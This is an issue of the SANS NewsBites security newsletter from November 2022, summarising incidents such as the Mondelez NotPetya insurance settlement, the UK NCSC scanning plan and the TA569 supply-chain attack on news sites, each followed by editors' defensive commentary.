SANS NewsBites

Five Years of Legal Action Gain Food Company a Cyberinsurance Settlement on NotPetya Claim; UK Intelligence Agency Proposes Scanning All UK Systems for Vulnerabilities; Check to Make Sure Advertising Networks Aren’t Attacking Your Customers From Your Sites

November 4, 2022  |  Volume XXIV - Issue #86

Top of the News


2022-11-02

Mondelez, Zurich American Insurance Company Settle Claim Lawsuit Over NotPetya Infection

Mondelez International has settled a lawsuit it brought against the Zurich American Insurance Company for the insurer’s refusal to pay a $100 million claim over a cyberattack. Mondelez International’s IT systems became infected with the NotPetya malware in 2017. The company says it incurred costs in excess of 100 million due to damaged hardware and operational software systems, supply and distribution disruptions, and other losses.

Editor's Note

As usual, the cost of avoiding this incident was likely much lower than the costs Mondelez incurred – even after achieving this settlement with their insurer. No details on how much Zurich paid Mondelez in the settlement, but most likely less than $100M. Plus Mondelez paid the insurance premiums with a deductible, and for 5 years of legal costs. The biggest impact to their bottom line is not those costs - in 2020, Mondelez had over $25B in revenue/turnover and almost $5B in profit. The biggest impact to profit was that they failed to protect their customers from being impacted.

John Pescatore
John Pescatore

You may not have heard of Mondelez, but you know their brands: Oreo Cookies, Sour Patch Kids candy, Ritz Crackers, etc. One of the topics being debated is whether this an act of war, (aka nation state attack) which would then invalidate the insurance claim. While the policy appeared to cover much of the damage incurred, the insurer was focused on NotPetya being Russian APT in origin, (originally used against Ukraine by the Sandworm APT) and therefore a nation state attack; what is not clear is if the collateral damage was also the actions of the APT. With efforts to tighten up insurance language, make sure that you not only tabletop this type of scenario, but have engaged legal counsel to both carefully review your most current policy and are prepared to defend your case. Include contingencies for an extended settlement timeframe, which you hopefully won't need.

Lee Neely
Lee Neely

We will likely never know the terms of the settlement but suffice it to say, adherence to essential cyber hygiene practices would have limited the costs of cleanup and recovery for Mondelez. Insurers over the past 24 months, have moved to require basic cybersecurity practices and evidence of such practices before establishing a cybersecurity policy. It remains to be seen whether the application of war exclusion clause, for which Zurich denied the claim, will continue to be included in future cybersecurity policies.

Curtis Dukes
Curtis Dukes

Poorly written insurance contracts create what the insurance industry calls a “moral hazard;” they invite people to assign to underwriters risk that, in the absence of such contracts, would be cheaper to mitigate.

William Hugh Murray
William Hugh Murray

2022-11-03

UK’s NCSC Will Scan Country’s Systems for Known Vulnerabilities

The UK’s National Cyber Security Centre (NCSC) plans to scan all Internet-connected systems hosted in the country for known vulnerabilities. In a blog post, NCSC Technical Director Ian Levy says the effort will be transparent, that NCSC will “publicly explain the purpose and scope of the scanning system, mark activity so that it can be traced back to the scanning system being used, audit scanning activity so abuse reports can be easily and confidently assessed, minimise scanning activity to reduce impact on target resources, and ensure opt-out requests are simple to send and processed quickly.”

Editor's Note

This points out part of the problem of intelligence agencies having responsibility for cyber defense, as well. The goals of intelligence agencies don’t always align with the rapid closing of vulnerabilities and even if the goals do align, history makes it harder to believe it is so. Seems like funding a third party to do the scanning and only provide NCSC with the aggregate data to meet their stated goals would be an alternative.

John Pescatore
John Pescatore

While I applaud NCSC’s efforts, there are already a number of cybersecurity risk rating platforms that exist in the marketplace today. In fact, they also include capabilities to evaluate third party trust. Perhaps teaming with one or more of those vendors can achieve greater measurement of cybersecurity for UK based organizations.

Curtis Dukes
Curtis Dukes

This is a double-edged sword. It is truly awesome to have another set of eyes cross checking for things you miss, but can be a true nuisance as you train them on accepted risks and minimizing disruptions caused by the scans. Do not use this as an excuse to not conduct your own scans. You want to be the one discovering issues on your systems. If faced with this scenario, make sure that you have clear information on contacts, scan schedules and intensity, then verify your team is detecting the activity. Make sure you have actively assigned response, remediation and tracking responsibilities.

Lee Neely
Lee Neely

This actually sounds like a great idea. At the scale of the UK, this might be an effective campaign that finds and begins treatment of the worst vulnerabilities. And as the federal government, they should have the ability to find device owners and contact them credibly.

Christopher Elgee
Christopher Elgee

Those who are proposing this program seem to have given a lot of thought to the unintended consequences. Surely the rogue hackers are scanning for your vulnerabilities. Rather than caution you about them, they will use them against you. Here, rather than have the state do the scanning, I would like to see the ISPs do it. While this may involve changes to their terms and conditions, they can promote it as a feature.

William Hugh Murray
William Hugh Murray

2022-11-03

Scores of US News Sites are Delivering Malware


Numerous news sites across the US are serving up malware, according to Proofpoint Threat Research. The issue appears to be a supply chain attack: the attackers targeted a content and advertising engine that serves videos and advertising via JavaScript to the more than 250 affected news sites.

Editor's Note

This is very similar to an incident in January, that affected realtor websites. A video delivery platform was compromised that affected multiple sites using the service. If applicable, the simplest solution is SRI (Subresource Integrity), which adds hashes to script tags retrieving remote content. But often the "business need" to track users interferes as it requires the JavaScript to change for each user, reducing the applicability of SRI hashes.

Johannes Ullrich
Johannes Ullrich

Those ads are obviously a source of revenue for the company sites showing them, so the cost of making sure that are safe and secure should be built into the business decisions to go after advertising revenue – but obviously that is too often not the case. If your company is hosting ads from third party services, this is a good one to use as part of briefing the management and the board.

John Pescatore
John Pescatore

So what do you do if your trusted site for media and content is itself compromised? Scanning _YOUR_ content won't reveal that: you have to look at things from an end-user POV and be prepared to disconnect the inappropriate feed as well as aggressively scan for discovered IOCs. Proofpoint is tracking this attack to an APT they call TA569, which is distributing the SocGholish (aka FakeUpdates) malware, which can lead to follow-up issues, including ransomware. TA569 is also adept at re-infecting remediated services, which means you need to be on your toes if you discover SocGholish.

Lee Neely
Lee Neely

Unfortunately most news outlets are 100% dependent upon ad revenue. Some of their "advertisers" are bound to be malicious, and that's just the water these agencies have to fish in.

Christopher Elgee
Christopher Elgee

The Rest of the Week's News


2022-11-03

Red Cross Wants a Digital Emblem to Protect Systems from Cyberattacks

The International Committee of the Red Cross (ICRC) is seeking support a digital emblem that would identify its systems as off-limits from cyberattacks. For such an emblem to take effect, states would need to agree on how it will be used and to codify it as part of International Humanitarian Law. The ICRC has proposed three possible solutions: a DNS-based emblem, an IP-based emblem, and an Authenticated Digital Emblem that uses certificate chains.

Editor's Note

Reminds me of the "Do Not Track" header browsers experimented with, or the "Do Not Hack" header I am adding as a bit of a joke to my web servers. Maybe the red cross should resurrect it's "redcross.int" domain again and use it for sites it attempts to protect.

Johannes Ullrich
Johannes Ullrich

My first response was to scoff, but one hundred and fifty years ago, it probably took many years for the Geneva Convention to recognize the Red Cross to protect medical workers on battlefields. There have been many incidents of that convention being violated, but respecting it largely has become part of the “norms” of physical battle. The difference these days is that it will quickly be used in phishing campaigns, and verification methods will be ignored.

John Pescatore
John Pescatore

The comparison to kinetic warfare, equating the digital emblem to a red-cross uniform, while an accurate analogy, may not be sufficient to deter attackers unless there is sufficient international law to support consequences which vastly outweigh the appeal of the attack. Even after that is in place, you still need to be prepared for an attack. Don't be the one not wearing Kevlar. Enable all the protections for services and devices you already own, make sure that you have a standard to set the minimum level of protections as well as how to incorporate these into your overall incident prevention and response capabilities, whether insourced or outsourced. Now review these regularly to make sure they are both functional and relevant.

Lee Neely
Lee Neely

Institutions like the Red Cross/Red Crescent should be declared off-limits from cyberattacks. While not a digital emblem, a plea was made to ransomware purveyors not to attack hospital and care centers during the onset of the COVID pandemic. That lasted about a week. It’s likely that nation states would abide by the intent of the digital emblem, cyber criminals however, have different motives.

Curtis Dukes
Curtis Dukes

So, a little while back, some of the major ransomware gangs promised they'd stop attacking hospitals, and here we are. I'm not saying it's foolish for the Red Cross to ask for such a thing, and it'd be fantastic if it worked, but count me skeptical.

Christopher Elgee
Christopher Elgee

2022-11-02

Dropbox: We Were Targeted in a Phishing Campaign

Dropbox has disclosed that it was the target of a phishing campaign in October after attackers managed to access Dropbox’s GitHub repositories. GitHub alerted Dropbox to suspicious activity. When Dropbox investigated, they learned that attackers had copied 130 code repositories. The incident is noteworthy because the attackers were able to bypass multi-factor authentication.

Editor's Note

Looks like this was a phishing attack that took advantage of vulnerabilities in CircleCI’s (a widely used continuous integration platform) implementation of MFA. Like all security controls, if you implement them badly they don’t keep the bad guys out. Part of supply chain security is making sure vendors are showing evidence of having their software tested for vulnerabilities or open attack paths.

John Pescatore
John Pescatore

The Drobpox blog provides not only an explanation of how, even with multiple layers of defense, the attackers were able to get access, as well as an assessment of their then MFA solution. As convenient as OTP/TOTP and SMS are for MFA, current attack techniques include processes for leveraging their shortfalls. Use the analysis to support your case to move to phishing resistant MFA.

Lee Neely
Lee Neely

2022-11-03

Charges Filed in Vastaamo Data Breach Case

Finnish police have charged one individual for his alleged role in a data breach that exposed sensitive personal information of patients receiving mental health treatment from the Vastaamo Psychotherapy Center. When Vastaamo refused to pay a ransom for the stolen information in 2020, the thief began attempting to extort payment from the patients. Julius “Zeekill” Kivimaki was charged and “arrested in absentia.”

Editor's Note

An interesting twist on a standard ransomware attack—eliciting payment from individuals whose patient records were exposed during the cyber breach. Two points to make: 1) Even attackers make mistakes. In this case, poor OPSEC practices led police investigators to identify the perpetrator. 2) Every business has a responsibility for establishing basic cyber hygiene practices. That includes ensuring administrator accounts are password protected and audit logs are routinely monitored for signs of cyberattack.

Curtis Dukes
Curtis Dukes

The big break came when Kivimaki published data from the breach which included his home folder, SSH keys, known-hosts and other big clues to who he was. While the Finns don't typically reveal this level of detail about suspects, the information revealed is strengthening cases for him to be imprisoned indefinitely. Vastaamo, while groundbreaking in enabling mental health services which were mostly covered by insurance with more than tolerable wait times, was dependent on a MySQL database which was Internet accessible with a blank Administrator password. Make sure that your security scanning is looking for this type of scenario, and that you are performing application security scans on a regular basis.

Lee Neely
Lee Neely

2022-11-02

US Treasury Thwarted DDoS Attack

In October, the US Treasury was able to fend off cyberattacks, according to a Treasury official. Todd Conklin, cybersecurity counselor to Deputy Treasury Secretary Wally Adeyemo, said the distributed denial-of-service (DDoS) attack targeted the agency’s critical infrastructure nodes. The attack has been attributed to a hacking group with ties to Russia.

Editor's Note

Better to be able to report a thwarted attack than to fall victim to one. After you have enabled DDoS protections both at your perimeter and at your cloud-based services, make sure that you are getting reports on their effectiveness: you may find it eye-opening. If possible, make sure that you're reporting these types of attacks to the FBI, CISA, etc. so they can be incorporated in larger response efforts.

Lee Neely
Lee Neely

Don’t forget to periodically test any DDoS response triggered switchovers!

John Pescatore
John Pescatore

2022-11-03

Chile’s ALMA Observatory Suspends Operations Due to Cyberattack

Chile’s Atacama Large Millimeter Array (ALMA) Observatory has suspended all astronomical observation operations and taken down its website following a cyberattack over the weekend. The observatory says that the attack did not affect antennas or any scientific data, and that they are “still working hard on the full recovery of services.”

Editor's Note

This breach shows that no organization is immune to cyberattack. What’s strange is the wording that the observatory’s antennas and scientific data were not affected. Ok, but then what was the purpose of the attack? Ransomware, evidently not. Control of the operational technology, no. There will be more to this story.

Curtis Dukes
Curtis Dukes

2022-11-02

Microsoft Fixes Vulnerability in Jupyter Notebooks for Azure Cosmos DB

Microsoft has fixed an authentication bypass vulnerability in Jupyter Notebooks for Azure Cosmos DB. Microsoft says that the missing authentication checks issue was introduced in August. Researchers from Orca reported the flaw to Microsoft in early October; Microsoft fixed the issue two days later.

Editor's Note

While the flaw was specific to Jupyter Notebooks for Azure Cosmos DB (99.8% of Azure Cosmos DB users are not in this category), and exploiting the flaw required guessing the 128-bit random GUID of an active session, aka "forwardingID" - which had to be used within an hour, Microsoft still patched the flaw by adding increased authentication checks. Since this is a server-side fix, no user action is necessary. Exploiting the flaw allowed full access to the Notebook.

Lee Neely
Lee Neely

Internet Storm Center Tech Corner

Breakpoints in Burp

https://isc.sans.edu/forums/diary/Breakpoints%20in%20Burp/29214/

Who Put the "Dark" in DarkVNC?

https://isc.sans.edu/forums/diary/Who+put+the+Dark+in+DarkVNC/29210

OpenSSL 3.0 Punycode Vulnerability Fix

https://isc.sans.edu/forums/diary/Critical+OpenSSL+30+Update+Released+Patches+CVE20223786+CVE20223602/29208

https://www.openssl.org/blog/blog/2022/11/01/email-address-overflows/

TA569 Supply Chain Attack Injects JavaScript

https://twitter.com/threatinsight/status/1587865920130752515

https://www.darkreading.com/application-security/supply-chain-attack-pushes-out-malware-to-more-than-250-media-websites

Link to old story similar to the above JavaScript injection

https://unit42.paloaltonetworks.com/web-skimmer-video-distribution/

Hitachi Infrastructure Analytics Advisor

https://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/hitachi-sec-2022-134/index.html

FortiNet Patches

https://fortiguard.fortinet.com/psirt?date=11-2022

Nessus Patches

https://www.tenable.com/security/tns-2022-24

sigstore General Availability

https://openssf.org/press-release/2022/10/25/sigstore-announces-general-availability-at-sigstorecon/

https://github.blog/2022-10-25-why-were-excited-about-the-sigstore-general-availability/

URLScan.io's SOAR Spot: Chatty Security Tools Leaking Private Data

https://positive.security/blog/urlscan-data-leaks

Checkmk: Remote Code Execution by Chaining Multiple Bugs

https://blog.sonarsource.com/checkmk-rce-chain-1/